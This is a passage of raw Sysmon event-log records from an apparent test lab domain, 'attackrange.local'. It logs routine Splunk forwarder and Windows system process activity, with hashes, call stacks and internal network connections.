AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001054291Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:50.049{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E410FF1023291E4C8D944ED159AEB5C5,SHA256=B7BCC45A8AD5DF99812B2A4A819BEE3E5466C664D477658CE18808C63E5E9AA3,IMPHASH=00000000000000000000000000000000falsetrue 
354300x8000000000000000810221Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:48.406{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57451-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000810223Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:51.677{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E2247F1517ED057B6A63F6A5C418B256,SHA256=94346C58DD4BE2C364F6EFC00AEAD492CB7DF76A12B25381211EB7D1F48DA1C2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054322Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:51.726{466BC892-F81B-60EB-EA7D-00000000CF01}95088848C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054321Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:06:51.495{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F81B-60EB-EA7D-00000000CF01}9508C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054320Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:51.495{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054319Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:06:51.495{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054318Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:51.495{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054317Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:06:51.495{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054316Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:51.495{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F81B-60EB-EA7D-00000000CF01}9508C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054315Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:51.495{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F81B-60EB-EA7D-00000000CF01}9508C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001054314Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:51.481{466BC892-F81B-60EB-EA7D-00000000CF01}9508C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001054313Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:51.195{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3C35834EBE052A4D97483ED6A4CB84D3,SHA256=C1C6B65ABBD6D893DA34363BF068798ABE8D2FFAF2D47541AC98CCA91BC57AC7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054312Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:06:51.195{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=249E327DCFBE9E00F94DAFF7A8CE4F49,SHA256=DEF7BE7DCE5B323B23C6E9B57A03577D08DEF3792064911D34869D37FB6E789A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054311Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:42.592{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61952-false10.0.1.12-8000- 23542300x80000000000000001054310Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:51.064{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B88F0B2A47142BC16BC82A431B4EAAFC,SHA256=4906C8DCD7E094F596178E74CC9C3BD01F7E0B218402169B1BDA9F274C8F1D42,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810224Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:06:52.756{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C072D387BB79DA90CA2454FA09C56A0F,SHA256=543B1B65FBFF368267450A64FB563A0E541FC11F9899051024D6454C52A86DD5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054341Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:52.979{466BC892-F81C-60EB-EC7D-00000000CF01}879610232C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054340Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:52.732{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F81C-60EB-EC7D-00000000CF01}8796C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054339Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:06:52.732{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054338Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:52.732{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054337Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:52.732{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F81C-60EB-EC7D-00000000CF01}8796C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054336Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:52.732{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054335Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:06:52.732{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054334Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:52.732{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F81C-60EB-EC7D-00000000CF01}8796C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001054333Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:52.727{466BC892-F81C-60EB-EC7D-00000000CF01}8796C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001054332Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:52.495{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3C35834EBE052A4D97483ED6A4CB84D3,SHA256=C1C6B65ABBD6D893DA34363BF068798ABE8D2FFAF2D47541AC98CCA91BC57AC7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054331Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:52.111{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F81C-60EB-EB7D-00000000CF01}5752C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001054330Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:52.111{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054329Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:52.111{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054328Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:06:52.111{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054327Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:06:52.111{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054326Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 